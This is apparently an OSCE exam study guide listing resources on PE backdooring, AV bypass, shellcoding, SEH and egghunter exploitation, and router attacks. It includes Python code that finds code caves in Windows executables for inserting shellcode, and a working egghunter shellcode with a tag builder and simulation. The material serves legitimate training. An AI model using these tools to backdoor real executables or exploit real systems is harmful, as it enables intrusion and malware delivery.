Found some notes from my OSCE study guide… I didn't compile this entire list, but I used this.
Online Study Resources
1. Advanced Web Attacks
2. Backdooring PE
- Backdooring PE Files - Part 1 and Part 2 (nice intro to basic PE backdooring)
- Manually Adding Shellcode to Windows Executables (Short and to the point)
- Introduction to Manual Backdooring by your favourite llama
- The Beginners Guide to Codecaves (Good read but don’t spend too much time on it)
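Every one of the backdooring write-ups above starts with the same step: find a run of unused null bytes (a code cave) in a section, note its file offset and RVA, and redirect the entry point or a hijacked call there. The script below is an added example, not code from any of the linked posts: it parses the PE section table by hand (no `pefile` dependency) and lists caves with the two numbers you need, the file offset to patch and the RVA to jump to, plus whether the section is already executable. The PE it scans is constructed in `build_sample_pe` and is not a real binary; all function names are mine.

```python
import re
import struct

# PE layout constants from the PE/COFF specification
PE_SIGNATURE_OFFSET = 0x3C      # e_lfanew in the DOS header
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_sections(image):
    """Walk the section table of a PE image held in memory as bytes."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, PE_SIGNATURE_OFFSET)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + COFF_HEADER_SIZE + opt_header_size
    sections = []
    for i in range(num_sections):
        hdr = table + i * SECTION_HEADER_SIZE
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, hdr)
        flags = struct.unpack_from("<I", image, hdr + 36)[0]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "virtual_address": va,
            "raw_size": raw_size,
            "raw_ptr": raw_ptr,
            "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
        })
    return sections


def find_caves(image, min_size=100):
    """Return (section, file_offset, rva, size, executable) for each run of
    at least min_size null bytes inside a section's raw data.

    Only on-disk bytes are scanned, because the patch has to land in the
    file to persist; the RVA is what the redirecting JMP at the entry point
    (or a hijacked call) targets. A cave in a non-executable section is
    usable only if the section characteristics are also patched to add
    IMAGE_SCN_MEM_EXECUTE.
    """
    pattern = re.compile(rb"\x00{%d,}" % min_size)
    caves = []
    for s in parse_sections(image):
        raw = image[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        for m in pattern.finditer(raw):
            caves.append((s["name"], s["raw_ptr"] + m.start(),
                          s["virtual_address"] + m.start(),
                          m.end() - m.start(), s["executable"]))
    return caves


def build_sample_pe():
    """Constructed test input: a minimal, non-runnable PE32 header with a
    .text section (256 null bytes of slack at its end) and a .data section
    (128 null bytes at its end). Not a real binary."""
    e_lfanew, opt_size, nsec, file_align = 0x40, 224, 2, 0x200
    hdr_end = e_lfanew + 4 + COFF_HEADER_SIZE + opt_size + nsec * SECTION_HEADER_SIZE
    hdr_size = -(-hdr_end // file_align) * file_align      # round up to FileAlignment
    text_raw, text_size = hdr_size, 0x400
    data_raw, data_size = hdr_size + text_size, 0x200
    img = bytearray(data_raw + data_size)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, PE_SIGNATURE_OFFSET, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    coff = e_lfanew + 4
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    struct.pack_into("<HHIIIHH", img, coff, 0x14C, nsec, 0, 0, 0, opt_size, 0x0102)
    struct.pack_into("<H", img, coff + COFF_HEADER_SIZE, 0x10B)   # PE32 magic
    sec = coff + COFF_HEADER_SIZE + opt_size
    struct.pack_into("<8sIIII", img, sec, b".text", 0x400, 0x1000, text_size, text_raw)
    struct.pack_into("<I", img, sec + 36, 0x60000020)             # CODE|EXECUTE|READ
    struct.pack_into("<8sIIII", img, sec + 40, b".data", 0x200, 0x2000, data_size, data_raw)
    struct.pack_into("<I", img, sec + 40 + 36, 0xC0000040)        # INITIALIZED_DATA|READ|WRITE
    img[text_raw:text_raw + text_size] = b"\x55\x8b\xec" + b"\x90" * (0x300 - 3) + b"\x00" * 0x100
    img[data_raw:data_raw + data_size] = b"A" * 0x180 + b"\x00" * 0x80
    return bytes(img)


if __name__ == "__main__":
    for name, off, rva, size, execute in find_caves(build_sample_pe()):
        print(f"{name:<8} file=0x{off:06x} rva=0x{rva:06x} size={size} exec={execute}")
```

On a real target, read the file with `open(path, "rb").read()` and pass it to `find_caves`. Prefer a cave in an already-executable section large enough for your shellcode plus the register save/restore and the jump back to the original entry point; the section slack between VirtualSize and SizeOfRawData that the sample shows is the usual place to find one.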
3. Bypassing AV
4. Exploit development
- Fuzzing
- Assembly and Shellcode basics
  - SLAE (great course for an assembly refresher and shellcoding basics)
  - SLAE alternatives for ASM: 1, 2
  - Understanding Windows Shellcode by Skape
  - Corelan: Introduction to Win32 shellcoding
  - FuzzySecurity: Writing W32 shellcode
- Stack Based Overflow
- SEH
  - Corelan 3a and 3b
  - FuzzySecurity’s Exploit Development 3
  - Securitysift’s Windows Exploit Development 6
  - The need for a POP POP RET instruction sequence
- Egghunting
  - Skape’s whitepaper on egg-hunting
  - Corelan 8
  - FuzzySecurity’s Exploit Development 4
  - Securitysift’s Windows Exploit Development 5
  - egg hunter - Exploit-DB
- Bypassing ASLR
  - Corelan Series 6
  - Bypassing ASLR
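The egghunting resources all build on the same 32-byte hunter from Skape's paper and the same two conventions: a 4-byte tag that is doubled in front of the payload, and a hunter that must itself be free of the target's bad characters. The following is an added example, not code from any of the linked posts. The hunter bytes are Skape's public NtDisplayString hunter; the rest is mine: a builder that patches in a custom tag and checks the result for bad characters, and `hunt`, a Python stand-in for the hunter's walk over memory (it reads a constructed dictionary of mapped regions directly, where the real hunter relies on the syscall return value to decide whether a page is readable). The tag, payload, region addresses and contents are all constructed for the demonstration.

```python
PAGE_SIZE = 0x1000

# Skape's 32-byte NtDisplayString egg hunter for 32-bit Windows. The tag is
# the imm32 of "mov eax, 0x74303077" ('w00t'), which sits at offset 18.
EGGHUNTER = bytes.fromhex(
    "6681caff0f"   # or dx, 0x0fff      ; move to the last byte of this page
    "42"           # inc edx            ; next address
    "52"           # push edx           ; save the address being probed
    "6a02" "58"    # push 2 / pop eax   ; NtDisplayString syscall number
    "cd2e"         # int 0x2e           ; kernel checks whether [edx] is readable
    "3c05"         # cmp al, 0x05       ; low byte of STATUS_ACCESS_VIOLATION
    "5a"           # pop edx
    "74ef"         # je <or dx,0x0fff>  ; unreadable: skip the whole page
    "b877303074"   # mov eax, 'w00t'
    "8bfa"         # mov edi, edx
    "af"           # scasd              ; [edi] == tag? (edi += 4)
    "75ea"         # jnz <inc edx>
    "af"           # scasd              ; second copy of the tag?
    "75e7"         # jnz <inc edx>
    "ffe7"         # jmp edi            ; edi now points just past the egg
)
TAG_OFFSET = 18


def build_egghunter(tag=b"w00t", bad_chars=b"\x00"):
    """Patch a custom 4-byte tag into the hunter and reject it if any byte
    the target cannot carry (bad_chars) ends up in the hunter."""
    if len(tag) != 4:
        raise ValueError("tag must be exactly 4 bytes (one scasd compare)")
    hunter = EGGHUNTER[:TAG_OFFSET] + tag + EGGHUNTER[TAG_OFFSET + 4:]
    bad = sorted({b for b in bad_chars if b in hunter})
    if bad:
        raise ValueError("hunter contains bad chars: "
                         + ", ".join(f"0x{b:02x}" for b in bad))
    return hunter


def build_egg(tag, payload):
    """The egg is the tag twice, then the payload. Doubling the tag keeps the
    hunter from matching the single copy inside its own mov instruction."""
    return tag * 2 + payload


def _lookup(regions, addr):
    for base, data in regions.items():
        if base <= addr < base + len(data):
            return base, data
    return None


def hunt(regions, tag, start=0):
    """Simulate the hunter's walk over a sparse 32-bit address space.

    regions maps a page-aligned base address to the bytes mapped there
    (constructed stand-in for process memory). Unmapped addresses are
    skipped a page at a time, exactly as the hunter does after the syscall
    reports an access violation. Returns the address "jmp edi" would land
    on (the payload start) or None if no doubled tag exists.
    """
    if not regions:
        return None
    egg = tag * 2
    end = max(base + len(data) for base, data in regions.items())
    addr = start
    while addr < end:
        hit = _lookup(regions, addr)
        if hit is None:
            addr = (addr | (PAGE_SIZE - 1)) + 1      # or dx, 0x0fff ; inc edx
            continue
        base, data = hit
        off = addr - base
        if data[off:off + 8] == egg:                 # scasd ; scasd
            return addr + 8
        addr += 1
    return None


if __name__ == "__main__":
    hunter = build_egghunter(b"w00t", bad_chars=b"\x00\x0a\x0d")
    payload = b"\xcc" * 16                           # constructed stand-in for shellcode
    regions = {                                      # constructed address space
        0x0012F000: b"A" * 64 + hunter + b"B" * 32,  # stack: the hunter itself lives here
        0x00370000: b"\x00" * 0x200 + build_egg(b"w00t", payload) + b"\x00" * 0x80,
    }
    print("hunter:", hunter.hex())
    print("payload found at: 0x%08x" % hunt(regions, b"w00t"))
```

Two practical points the simulation makes visible: the tag has to pass the same bad-character filter as the hunter (it is embedded in it), and a stray single copy of the tag anywhere in memory, including the hunter's own `mov eax`, is not a match because both `scasd` compares must succeed.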
5. Advanced Network Attacks
- Bypassing Router’s Access Control List
- Firewall ACL Bypass
- Hacking networks with SNMP
- TCP Session Hijacking
- Cisco SNMP configuration attack with a GRE tunnel
- Exploiting Cisco Routers
6. Study cases:
Offline Study Resources
- Hacking: The Art of Exploitation: Chapters 1, 2, 3 and 5 are relevant to OSCE.
- Assembly Language Step-by-Step: Programming with Linux
- The Shellcoder’s Handbook: Discovering and Exploiting Security Holes